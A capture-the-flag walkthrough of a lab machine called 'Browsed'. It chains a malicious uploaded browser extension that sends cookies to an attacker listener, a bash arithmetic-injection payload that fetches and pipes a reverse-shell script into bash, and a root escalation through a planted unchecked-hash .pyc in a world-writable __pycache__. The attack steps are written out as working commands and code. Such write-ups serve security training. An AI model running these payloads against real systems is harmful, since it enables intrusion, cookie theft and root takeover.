Browsed

by 0xW1LD


Enumeration

Scans

As usual we start off with an nmap port scan


PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 02:c8:a4:ba:c5:ed:0b:13:ef:b7:e7:d7:ef:a2:9d:92 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJW1WZr+zu8O38glENl+84Zw9+Dw/pm4IxFauRRJ+eAFkuODRBg+5J92dT0p/BZLMz1wZMjd6BLjAkB1LHDAjqQ=

| 256 53:ea:be:c7:07:05:9d:aa:9f:44:f8:bf:32:ed:5c:9a (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICE6UoMGXZk41AvU+J2++RYnxElAD3KNSjatTdCeEa1R

80/tcp open http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)

|_http-title: Browsed

|_http-server-header: nginx/1.24.0 (Ubuntu)

| http-methods:

|_ Supported Methods: GET HEAD

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have 2 open ports:

22 - OpenSSH 9.6p1

80 - nginx 1.24.0

Port 22 - OpenSSH 9.6p1

This version of OpenSSH is only about 2 years old and has no significant known CVEs. Hunting for a 0-day in its source code is out of scope for this writeup, so let's move on to the other port.

Port 80 - NGINX 1.24.0



Visiting the NGINX server on port 80, we're greeted with the website of a browser-focused company.



Samples

The samples page contains several sample extensions for the browser.

Sample

Downloading the Replace Images extension and unzipping it, we find 2 files inside:


$ ls -lash

total 16K

4.0K drwxr-xr-x 2 kasm-user kasm-user 4.0K Jan 11 00:33 .

4.0K drwxr-xr-x 4 kasm-user kasm-user 4.0K Jan 11 00:33 ..

4.0K -rw-rw-r-- 1 kasm-user kasm-user 348 Mar 23 2025 content.js

4.0K -rw-rw-r-- 1 kasm-user kasm-user 315 Mar 19 2025 manifest.json

content.js is a simple content script: it points every image on the page at a single replacement image URL.


// use an image of your liking !

// const replacementImageUrl = "Your favourite image here"

const replacementImageUrl = "https://preview.redd.it/why-is-larry-so-evil-v0-ty3qlu4swjle1.jpeg?auto=webp&s=41fc3ee5bcec63e5cb4cc69757a812fb80143f47"

document.querySelectorAll('img').forEach(img => {

img.src = replacementImageUrl;

img.srcset = "";

});

manifest.json is a standard Manifest V3 file describing the extension; it injects content.js into every page once the document is idle.


{

"manifest_version": 3,

"name": "Replace Images",

"version": "1.0.0",

"description": "Replaces every image on a page with one from a URL.",

"permissions": ["scripting"],

"content_scripts": [

{

"matches": ["<all_urls>"],

"js": ["content.js"],

"run_at": "document_idle"

}

]

}

Upload Extension



The Upload Extension page lets any unauthenticated user upload a zip file containing an extension. It also mentions that the developers will run submitted extensions and provide feedback. Lastly, it states that the files must sit directly at the root of the zip archive rather than inside a folder.
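Because the upload form wants the files at the root of the archive, it helps to build the zip with explicit entry names. Here's a minimal Python sketch of that (the function name and paths are my own, not anything the site requires); it does the same job as running zip exploit.zip * from inside the extension folder.

```python
import os
import zipfile


def build_extension_zip(src_dir: str, out_path: str) -> list[str]:
    """Zip the regular files at the top level of src_dir into out_path.

    Each file is stored under its bare name (no folder prefix), so
    manifest.json and content.js land at the root of the archive.
    Returns the archive entry names in the order they were added.
    """
    out_abs = os.path.abspath(out_path)
    added = []
    with zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in sorted(os.listdir(src_dir)):
            path = os.path.join(src_dir, name)
            # Skip sub-folders and the output zip itself if it lives in src_dir.
            if not os.path.isfile(path) or os.path.abspath(path) == out_abs:
                continue
            zf.write(path, arcname=name)
            added.append(name)
    return added
```

For example, build_extension_zip("exploit", "exploit.zip") would pack a hypothetical exploit/ folder holding content.js and manifest.json.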

User

Finding the Gitea instance

Let's copy the Replace Images extension and modify it. First, I'll change content.js to make a callback to us:


fetch("http://10.10.14.117:9001");

Then I’ll also modify the manifest.json file


{

"manifest_version": 3,

"name": "w1ld's exploit",

"version": "1.0.0",

"description": "a simple javascript exploit",

"permissions": ["scripting"],

"content_scripts": [

{

"matches": ["<all_urls>"],

"js": ["content.js"],

"run_at": "document_idle"

}

]

}

Let’s zip up our payload.


$ zip exploit.zip *

adding: content.js (deflated 3%)

adding: manifest.json (deflated 41%)

Let's now start a listener, upload the zip, and send it to the developers:


$ nc -lvnp 9001

listening on [any] 9001 ...

connect to [10.10.14.117] from (UNKNOWN) [10.129.4.29] 46024

GET / HTTP/1.1

Host: 10.10.14.117:9001

Connection: keep-alive

Accept-Language: en-US,en;q=0.9

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

Accept: */*

Origin: http://browsedinternals.htb

Accept-Encoding: gzip, deflate

Interesting: the request's Origin header is http://browsedinternals.htb. First, let's check whether there are any cookies we can grab. I'll modify content.js to POST document.cookie back to us:


fetch("http://10.10.14.117:9001",{method: "POST", mode: "no-cors", body: document.cookie});

Let’s once again zip this up, start a listener, upload the file and send it to the developer.


$ socat TCP4-LISTEN:9001,reuseaddr,fork -

POST / HTTP/1.1

Host: 10.10.14.117:9001

Connection: keep-alive

Content-Length: 0

Accept-Language: en-US,en;q=0.9

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

Content-Type: text/plain;charset=UTF-8

Accept: */*

Origin: http://browsedinternals.htb

Accept-Encoding: gzip, deflate

I'm using socat here so that I can fork connections and keep a single listener running, rather than restarting it every time a connection comes in.
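If socat isn't available, a similar always-on listener can be put together with Python's standard library. This is a sketch rather than what I actually ran: ThreadingHTTPServer handles each callback on its own thread, and the handler simply records the method, path, Origin header and body of whatever the extension sends. The default port 9001 mirrors the listener above; the names CAPTURED, CallbackHandler and serve are my own.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Every callback is stored here; handlers run on separate threads.
CAPTURED: list[dict] = []
_LOCK = threading.Lock()


class CallbackHandler(BaseHTTPRequestHandler):
    """Record the method, path, Origin header and body of each request."""

    def _record(self) -> None:
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode(errors="replace")
        entry = {
            "method": self.command,
            "path": self.path,
            "origin": self.headers.get("Origin"),
            "body": body,
        }
        with _LOCK:
            CAPTURED.append(entry)
        print(entry, flush=True)
        # An empty 200 response lets the extension's fetch() finish cleanly.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_GET = _record
    do_POST = _record

    def log_message(self, format, *args):
        """Silence the default per-request access log on stderr."""


def serve(port: int = 9001) -> ThreadingHTTPServer:
    """Start the listener on a background thread and return the server."""
    server = ThreadingHTTPServer(("0.0.0.0", port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

In a real session you'd call serve() and keep the main thread alive, or run ThreadingHTTPServer(("0.0.0.0", 9001), CallbackHandler).serve_forever() directly in the foreground.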



It doesn't look like any cookie was sent back (the POST body is empty, Content-Length: 0), but we've still discovered http://browsedinternals.htb, so let's take a look.

Enumerating the Gitea instance

It's a Gitea instance, and browsing its repositories we find only one:


larry/MarkdownPreview

Python 0 0

Updated 2025-08-17 11:06:05 +00:00

Looking at app.py, the MarkdownPreview application listens on port 5000, bound to localhost only.


from flask import Flask, request, send_from_directory, redirect
from werkzeug.utils import secure_filename
import markdown
import os, subprocess
import uuid

app = Flask(__name__)
FILES_DIR = "files"

# Ensure the files/ directory exists
os.makedirs(FILES_DIR, exist_ok=True)

@app.route('/')
def index():
    return '''
    <h1>Markdown Previewer</h1>
    <form action="/submit" method="POST">
        <textarea name="content" rows="10" cols="80"></textarea><br>
        <input type="submit" value="Render & Save">
    </form>
    <p><a href="/files">View saved HTML files</a></p>
    '''

@app.route('/submit', methods=['POST'])
def submit():
    content = request.form.get('content', '')
    if not content.strip():
        return 'Empty content. <a href="/">Go back</a>'

    # Convert markdown to HTML
    html = markdown.markdown(content)

    # Save HTML to unique file
    filename = f"{uuid.uuid4().hex}.html"
    filepath = os.path.join(FILES_DIR, filename)
    with open(filepath, 'w') as f:
        f.write(html)

    return f'''
    <p>File saved as <code>{filename}</code>.</p>
    <p><a href="/view/{filename}">View Rendered HTML</a></p>
    <p><a href="/">Go back</a></p>
    '''

@app.route('/files')
def list_files():
    files = [f for f in os.listdir(FILES_DIR) if f.endswith('.html')]
    links = '\n'.join([f'<li><a href="/view/{f}">{f}</a></li>' for f in files])
    return f'''
    <h1>Saved HTML Files</h1>
    <ul>{links}</ul>
    <p><a href="/">Back to editor</a></p>
    '''

@app.route('/routines/<rid>')
def routines(rid):
    # Call the script that manages the routines
    # Run bash script with the input as an argument (NO shell)
    subprocess.run(["./routines.sh", rid])
    return "Routine executed !"

@app.route('/view/<filename>')
def view_file(filename):
    filename = secure_filename(filename)
    if not filename.endswith('.html'):
        return "Invalid filename", 400
    return send_from_directory(FILES_DIR, filename)

# The webapp should only be accessible through localhost
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000)

Interestingly, the /routines/<rid> route runs a routines.sh script, passing rid as its argument. Let's take a look at routines.sh:


#!/bin/bash

ROUTINE_LOG="/home/larry/markdownPreview/log/routine.log"

BACKUP_DIR="/home/larry/markdownPreview/backups"

DATA_DIR="/home/larry/markdownPreview/data"

TMP_DIR="/home/larry/markdownPreview/tmp"

log_action() {

echo "[$(date '+%Y-%m-%d %H:%M:%S')] $1" >> "$ROUTINE_LOG"

}

if [[ "$1" -eq 0 ]]; then

# Routine 0: Clean temp files

find "$TMP_DIR" -type f -name "*.tmp" -delete

log_action "Routine 0: Temporary files cleaned."

echo "Temporary files cleaned."

elif [[ "$1" -eq 1 ]]; then

# Routine 1: Backup data

tar -czf "$BACKUP_DIR/data_backup_$(date '+%Y%m%d_%H%M%S').tar.gz" "$DATA_DIR"

log_action "Routine 1: Data backed up to $BACKUP_DIR."

echo "Backup completed."

elif [[ "$1" -eq 2 ]]; then

# Routine 2: Rotate logs

find "$ROUTINE_LOG" -type f -name "*.log" -exec gzip {} \;

log_action "Routine 2: Log files compressed."

echo "Logs rotated."

elif [[ "$1" -eq 3 ]]; then

# Routine 3: System info dump

uname -a > "$BACKUP_DIR/sysinfo_$(date '+%Y%m%d').txt"

df -h >> "$BACKUP_DIR/sysinfo_$(date '+%Y%m%d').txt"

log_action "Routine 3: System info dumped."

echo "System info saved."

else

log_action "Unknown routine ID: $1"

echo "Routine ID not implemented."

fi

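Even though app.py calls the script without a shell, rid ends up in [[ "$1" -eq N ]] comparisons, which evaluate their operands as arithmetic expressions. That makes a malicious rid a promising path to code execution.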
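It's worth confirming why the injection has to happen inside routines.sh rather than in Flask: with an argument list and no shell=True, subprocess.run hands rid to the program verbatim, so $(...) is never expanded on the way in. A quick check in Python, assuming a POSIX system with printf available (passthrough is a throwaway helper name):

```python
import subprocess


def passthrough(arg: str) -> str:
    """Run printf with an argv list (no shell) and return what it received."""
    result = subprocess.run(
        ["printf", "%s", arg],  # list form: no /bin/sh, so no expansion
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


print(passthrough("$(id)"))  # prints the literal text $(id), not the output of id
```

The expansion therefore only happens once bash itself evaluates $1, which is exactly what the [[ ... -eq ... ]] tests in routines.sh do.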

Exploiting MarkdownPreview

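Let's clone the repository and test a payload locally first. The payload downloads ra.sh (a reverse shell script) from a web server on my machine at port 3232 and pipes it to bash. I'll base64-encode it to avoid putting the command's slashes and spaces directly into the URL path, then run the Flask app and curl the routines endpoint with the payload.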


$ echo 'curl http://10.10.14.117:3232/ra.sh|/bin/bash' | base64

Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==

# payload before URL encoding: $(echo Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64 -d|bash)

$ curl 'http://127.0.0.1:5000/routines/%24%28echo%2BY3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg%3D%3D%7Cbase64%2B%2Dd%7Cbash%29'

Routine executed !

$ python3 app.py

* Serving Flask app 'app'

* Debug mode: off

WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.

* Running on http://127.0.0.1:5000

Press CTRL+C to quit

127.0.0.1 - - [11/Jan/2026 01:40:38] "GET /routines/$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|%2Fbin%2Fbash) HTTP/1.1" 404 -

127.0.0.1 - - [11/Jan/2026 01:41:25] "GET /routines/x[$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|%2Fbin%2Fbash)] HTTP/1.1" 404 -

./routines.sh: line 12: [[: $(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash): arithmetic syntax error: operand expected (error token is "$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash)")

./routines.sh: line 18: [[: $(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash): arithmetic syntax error: operand expected (error token is "$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash)")

./routines.sh: line 24: [[: $(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash): arithmetic syntax error: operand expected (error token is "$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash)")

./routines.sh: line 30: [[: $(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash): arithmetic syntax error: operand expected (error token is "$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash)")

./routines.sh: line 9: /home/larry/markdownPreview/log/routine.log: No such file or directory

Routine ID not implemented.

127.0.0.1 - - [11/Jan/2026 01:43:16] "GET /routines/$(echo+Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64+-d|bash) HTTP/1.1" 200 -

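These errors occur because [[ "$1" -eq 0 ]] evaluates $1 as an arithmetic expression, and a bare $(...) is not a valid arithmetic operand, so bash rejects it without running anything. Bash does, however, expand array subscripts during arithmetic evaluation, so wrapping the command substitution in a subscript such as w1ld[$(...)] gets our command executed. Let's use this arithmetic injection instead.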
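The difference between the two payload shapes can be reproduced in isolation. The sketch below runs a one-line stand-in for routines.sh (my simplification, not the real script) that performs the same [[ "$1" -eq 0 ]] test, passing the payload as $1 just like app.py does. Instead of a reverse shell, the hidden command harmlessly touches a marker file in a temporary directory, so we can see which form actually executes. It assumes bash is on the PATH.

```python
import os
import subprocess
import tempfile

# Minimal stand-in for the first check in routines.sh.
CHECK = '[[ "$1" -eq 0 ]] && echo "routine 0" || echo "other routine"'


def runs_command(payload_template: str) -> bool:
    """Return True if bash executed the command hidden in the payload.

    payload_template must contain {cmd}; it is replaced with a command
    that creates a marker file, and we check whether the file appeared.
    """
    with tempfile.TemporaryDirectory() as d:
        marker = os.path.join(d, "pwned")
        payload = payload_template.format(cmd=f"touch {marker}")
        # $0 = "routines.sh", $1 = payload, passed as a plain argv entry.
        subprocess.run(["bash", "-c", CHECK, "routines.sh", payload],
                       capture_output=True, text=True)
        return os.path.exists(marker)


print(runs_command("$({cmd})"))        # bare substitution: rejected as an operand
print(runs_command("w1ld[$({cmd})]"))  # array subscript: expanded, so touch runs
```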


# Updated payload:

# w1ld[$(echo Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg==|base64 -d|bash)]

$ curl 'http://127.0.0.1:5000/routines/w1ld%5B%24%28echo%20Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg%3D%3D%7Cbase64%20%2Dd%7Cbash%29%5D'

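This works locally, so I'll modify content.js to request the routines endpoint with our payload. Since the extension runs in the developer's browser on the target, 127.0.0.1:5000 refers to the target's own MarkdownPreview instance.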


fetch('http://127.0.0.1:5000/routines/w1ld%5B%24%28echo%20Y3VybCBodHRwOi8vMTAuMTAuMTQuMTE3OjMyMzIvcmEuc2h8L2Jpbi9iYXNoCg%3D%3D%7Cbase64%20%2Dd%7Cbash%29%5D')
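The fetch() line can also be generated instead of encoded by hand. This sketch base64-encodes the command with a trailing newline (matching echo | base64 above), wraps it in the w1ld[$(...)] form and percent-encodes it for the /routines/<rid> path. urllib.parse.quote leaves "-" unescaped, so the output differs cosmetically from the hand-written %2D, but both decode to the same rid. The helper names are hypothetical; the IP and ports are the ones used in this writeup.

```python
import base64
from urllib.parse import quote

# Localhost from the point of view of the developer's browser on the target.
TARGET = "http://127.0.0.1:5000/routines/"


def build_rid(command: str) -> str:
    """Wrap a shell command in the array-subscript injection used above."""
    b64 = base64.b64encode((command + "\n").encode()).decode()
    # A "/" in the rid appears to break the /routines/<rid> route
    # (see the 404s above), so refuse encodings that contain one.
    if "/" in b64:
        raise ValueError("base64 output contains '/'; tweak the command")
    return f"w1ld[$(echo {b64}|base64 -d|bash)]"


def build_fetch(command: str) -> str:
    """Return the content.js line that triggers the malicious routine."""
    return f"fetch('{TARGET}{quote(build_rid(command), safe='')}')"


print(build_fetch("curl http://10.10.14.117:3232/ra.sh|/bin/bash"))
```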

After uploading this extension and sending it to the developers, we get a shell!


larry@browsed:~/markdownPreview$

Just like that, we have User!

Root

Sudo script Enumeration

Looking around, we find that larry can run /opt/extensiontool/extension_tool.py as root without a password:


larry@browsed:~/markdownPreview$ sudo -l

Matching Defaults entries for larry on browsed:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User larry may run the following commands on browsed:

(root) NOPASSWD: /opt/extensiontool/extension_tool.py

Looking at /opt/extensiontool, the __pycache__ directory is world-writable (drwxrwxrwx), so we can write to it.


larry@browsed:/opt/extensiontool$ ls -lash

total 24K

4.0K drwxr-xr-x 4 root root 4.0K Dec 11 07:54 .

4.0K drwxr-xr-x 4 root root 4.0K Aug 17 12:55 ..

4.0K drwxrwxr-x 5 root root 4.0K Mar 23 2025 extensions

4.0K -rwxrwxr-x 1 root root 2.7K Mar 27 2025 extension_tool.py

4.0K -rw-rw-r-- 1 root root 1.3K Mar 23 2025 extension_utils.py

4.0K drwxrwxrwx 2 root root 4.0K Jan 11 01:55 __pycache__
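The key detail is the drwxrwxrwx mode on __pycache__ with no sticky bit, meaning any user can create, replace or delete files in it. As a sketch (the helper name is my own), here's how such directories could be spotted with nothing but os and stat:

```python
import os
import stat


def world_writable_dirs(root: str) -> list[str]:
    """List directories below root that any user may write to.

    Sticky-bit directories such as /tmp are skipped, since there users
    cannot delete or replace each other's files. Symlinks are not followed.
    """
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # vanished or unreadable entry
            if (stat.S_ISDIR(mode) and mode & stat.S_IWOTH
                    and not mode & stat.S_ISVTX):
                found.append(path)
    return found
```

On this box, world_writable_dirs("/opt/extensiontool") should report the __pycache__ directory shown above.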

Looking at extension_tool.py, it imports validate_manifest and clean_temp_files from extension_utils.py, which lives in the same directory:


#!/usr/bin/python3.12
import json
import os
from argparse import ArgumentParser
from extension_utils import validate_manifest, clean_temp_files
import zipfile

EXTENSION_DIR = '/opt/extensiontool/extensions/'

def bump_version(data, path, level='patch'):
    version = data["version"]
    major, minor, patch = map(int, version.split('.'))
    if level == 'major':
        major += 1
        minor = patch = 0
    elif level == 'minor':
        minor += 1
        patch = 0
    else:
        patch += 1

    new_version = f"{major}.{minor}.{patch}"
    data["version"] = new_version

    with open(path, 'w', encoding='utf-8') as f:
        json.dump(data, f, indent=2)

    print(f"[+] Version bumped to {new_version}")
    return new_version

def package_extension(source_dir, output_file):
    temp_dir = '/opt/extensiontool/temp'
    if not os.path.exists(temp_dir):
        os.mkdir(temp_dir)
    output_file = os.path.basename(output_file)
    with zipfile.ZipFile(os.path.join(temp_dir,output_file), 'w', zipfile.ZIP_DEFLATED) as zipf:
        for foldername, subfolders, filenames in os.walk(source_dir):
            for filename in filenames:
                filepath = os.path.join(foldername, filename)
                arcname = os.path.relpath(filepath, source_dir)
                zipf.write(filepath, arcname)
    print(f"[+] Extension packaged as {temp_dir}/{output_file}")

def main():
    parser = ArgumentParser(description="Validate, bump version, and package a browser extension.")
    parser.add_argument('--ext', type=str, default='.', help='Which extension to load')
    parser.add_argument('--bump', choices=['major', 'minor', 'patch'], help='Version bump type')
    parser.add_argument('--zip', type=str, nargs='?', const='extension.zip', help='Output zip file name')
    parser.add_argument('--clean', action='store_true', help="Clean up temporary files after packaging")

    args = parser.parse_args()

    if args.clean:
        clean_temp_files(args.clean)

    args.ext = os.path.basename(args.ext)
    if not (args.ext in os.listdir(EXTENSION_DIR)):
        print(f"[X] Use one of the following extensions : {os.listdir(EXTENSION_DIR)}")
        exit(1)

    extension_path = os.path.join(EXTENSION_DIR, args.ext)
    manifest_path = os.path.join(extension_path, 'manifest.json')

    manifest_data = validate_manifest(manifest_path)

    # Possibly bump version
    if (args.bump):
        bump_version(manifest_data, manifest_path, args.bump)
    else:
        print('[-] Skipping version bumping')

    # Package the extension
    if (args.zip):
        package_extension(extension_path, args.zip)
    else:
        print('[-] Skipping packaging')

if __name__ == '__main__':
    main()

Python cached library exploitation

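Since __pycache__ is world-writable, we can plant our own compiled version of extension_utils there. When extension_tool.py imports extension_utils, Python loads the cached bytecode from __pycache__/extension_utils.cpython-312.pyc if it considers it valid instead of recompiling the source, so a malicious .pyc there should give us code execution as root. Let's write a modified copy of extension_utils.py; I simply added a reverse shell call to the validate_manifest function.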


import os
import json
import subprocess
import shutil
from jsonschema import validate, ValidationError

# Simple manifest schema that we'll validate
MANIFEST_SCHEMA = {
    "type": "object",
    "properties": {
        "manifest_version": {"type": "number"},
        "name": {"type": "string"},
        "version": {"type": "string"},
        "permissions": {"type": "array", "items": {"type": "string"}},
    },
    "required": ["manifest_version", "name", "version"]
}

# --- Manifest validate ---
def validate_manifest(path):
    # I ADDED THIS LINE HERE:
    os.system("curl http://10.10.14.117:3232/ra.sh | /bin/bash")
    with open(path, 'r', encoding='utf-8') as f:
        data = json.load(f)
    try:
        validate(instance=data, schema=MANIFEST_SCHEMA)
        print("[+] Manifest is valid.")
        return data
    except ValidationError as e:
        print("[x] Manifest validation error:")
        print(e.message)
        exit(1)

# --- Clean Temporary Files ---
def clean_temp_files(extension_dir):
    """ Clean up temporary files or unnecessary directories after packaging """
    temp_dir = '/opt/extensiontool/temp'
    if os.path.exists(temp_dir):
        shutil.rmtree(temp_dir)
        print(f"[+] Cleaned up temporary directory {temp_dir}")
    else:
        print("[+] No temporary files to clean.")
    exit(0)

Let's compile it as an unchecked hash-based .pyc and write it straight into the __pycache__ folder:


larry@browsed:/tmp/w1ld$ python3.12 -c 'import py_compile; py_compile.compile("extension_utils.py", cfile="/opt/extensiontool/__pycache__/extension_utils.cpython-312.pyc", invalidation_mode=py_compile.PycInvalidationMode.UNCHECKED_HASH)'

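We don't have to craft a header whose source timestamp and size match the original extension_utils.py, because compiling with invalidation_mode=UNCHECKED_HASH marks the .pyc as hash-based with source checking disabled, so the interpreter never compares it against the source. Hash-based .pyc files require Python 3.7 or later, and this only works when the interpreter is not run with --check-hash-based-pycs set to always.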
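The effect of UNCHECKED_HASH can be demonstrated safely in a throwaway directory. This sketch uses a hypothetical module, demo_utils, rather than the box's files: it compiles one version of the module into the exact __pycache__ path the import system looks up, then rewrites the source and shows that the import still runs the stale bytecode. It also reads the PEP 552 flags field from the header, where 0b01 means "hash-based, don't check the source".

```python
import importlib
import importlib.util
import os
import py_compile
import sys
import tempfile


def stale_import_demo() -> tuple[int, str]:
    """Return (pyc flags, VALUE seen by import) for an unchecked-hash pyc."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "demo_utils.py")
        with open(src, "w") as f:
            f.write("VALUE = 'from pyc'\n")
        # Same slot the importer uses, e.g. __pycache__/demo_utils.cpython-312.pyc
        cfile = importlib.util.cache_from_source(src)
        py_compile.compile(
            src, cfile=cfile, doraise=True,
            invalidation_mode=py_compile.PycInvalidationMode.UNCHECKED_HASH)

        # Change the source; a timestamp or checked-hash pyc would now be stale.
        with open(src, "w") as f:
            f.write("VALUE = 'from source'\n")

        # Header layout: 4-byte magic, 4-byte flags, 8-byte source hash.
        with open(cfile, "rb") as f:
            flags = int.from_bytes(f.read(16)[4:8], "little")

        sys.path.insert(0, d)
        try:
            importlib.invalidate_caches()
            sys.modules.pop("demo_utils", None)
            value = importlib.import_module("demo_utils").VALUE
        finally:
            sys.path.remove(d)
            sys.modules.pop("demo_utils", None)
    return flags, value
```

stale_import_demo() returns (1, "from pyc"): the import ignores the edited source, which is the same reason extension_tool.py runs our code even though the real extension_utils.py is never touched.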

Now let’s run the script as sudo.


larry@browsed:/tmp/w1ld$ sudo /opt/extensiontool/extension_tool.py --ext Fontify

[+] Manifest is valid.

[-] Skipping version bumping

[-] Skipping packaging

There might be a timing issue, so run the script as soon as you've compiled the cache file.

I get a callback on my listener!


root@browsed:/tmp/w1ld# whoami

root

Just like that, we have Root!

tags: boxes - os/linux - diff/medium